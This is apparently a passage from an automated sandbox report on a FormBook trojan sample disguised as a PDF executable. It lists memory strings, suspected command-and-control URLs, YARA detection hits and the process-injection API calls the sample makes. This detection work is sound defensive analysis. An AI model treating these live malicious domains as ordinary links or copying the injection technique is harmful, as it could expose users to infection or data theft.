65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Kevin-torkelson.info
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/All_Inclusive_Vacation_Packages.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2F
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/Anti_Wrinkle_Creams.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/High_Speed_Internet.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/Parental_Control.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZ
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/__media__/design/underconstructionnotice.php?d=kevin-torkelson.info
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/__media__/js/trademark.php?d=kevin-torkelson.info&type=ns
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kevin-torkelson.info/fashion_trends.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZHr
            Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3155322481.00000000007C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mandemj.top
            Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3155322481.00000000007C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mandemj.top/to69/
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cmdl32.exe, 0000000C.00000002.3159746980.00000000057D4000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.0000000002B84000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020F04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://jino.ru
            Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033.
            Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: cmdl32.exe, 0000000C.00000003.1967966189.000000000809C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_0045A10F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_0045A10F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,6_2_0046DC80
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,6_2_0044C37A
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Product Data Specifications_PDF.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042C893 NtClose,9_2_0042C893
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672B60 NtClose,LdrInitializeThunk,9_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036735C0 NtCreateMutant,LdrInitializeThunk,9_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03674340 NtSetContextThread,9_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03674650 NtSuspendThread,9_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BE0 NtQueryValueKey,9_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BF0 NtAllocateVirtualMemory,9_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BA0 NtEnumerateValueKey,9_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672B80 NtQueryInformationFile,9_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AF0 NtWriteFile,9_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AD0 NtReadFile,9_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AB0 NtWaitForSingleObject,9_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F60 NtCreateProcessEx,9_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F30 NtCreateSection,9_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FE0 NtCreateFile,9_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FA0 NtQuerySection,9_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FB0 NtResumeThread,9_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F90 NtProtectVirtualMemory,9_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672E30 NtWriteVirtualMemory,9_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672EE0 NtQueueApcThread,9_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672EA0 NtAdjustPrivilegesToken,9_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672E80 NtReadVirtualMemory,9_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D30 NtUnmapViewOfSection,9_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D00 NtSetInformationFile,9_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D10 NtMapViewOfSection,9_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DD0 NtDelayExecution,9_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DB0 NtEnumerateKey,9_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C60 NtCreateKey,9_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C70 NtFreeVirtualMemory,9_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C00 NtQueryInformationProcess,9_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CF0 NtOpenProcess,9_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CC0 NtQueryVirtualMemory,9_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CA0 NtQueryInformationToken,9_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673010 NtOpenDirectoryObject,9_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673090 NtSetValueKey,9_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036739B0 NtGetContextThread,9_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673D70 NtOpenThread,9_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673D10 NtOpenProcessToken,9_2_03673D10
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E34650 NtSuspendThread,LdrInitializeThunk,12_2_04E34650
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E34340 NtSetContextThread,LdrInitializeThunk,12_2_04E34340
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04E32CA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32C60 NtCreateKey,LdrInitializeThunk,12_2_04E32C60
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04E32C70
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04E32DF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32DD0 NtDelayExecution,LdrInitializeThunk,12_2_04E32DD0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04E32D30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04E32D10
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04E32EE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04E32E80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32FE0 NtCreateFile,LdrInitializeThunk,12_2_04E32FE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32FB0 NtResumeThread,LdrInitializeThunk,12_2_04E32FB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32F30 NtCreateSection,LdrInitializeThunk,12_2_04E32F30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32AF0 NtWriteFile,LdrInitializeThunk,12_2_04E32AF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32AD0 NtReadFile,LdrInitializeThunk,12_2_04E32AD0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04E32BE0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04E32BF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04E32BA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E32B60 NtClose,LdrInitializeThunk,12_2_04E32B60
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E335C0 NtCreateMutant,LdrInitializeThunk,12_2_04E335C0
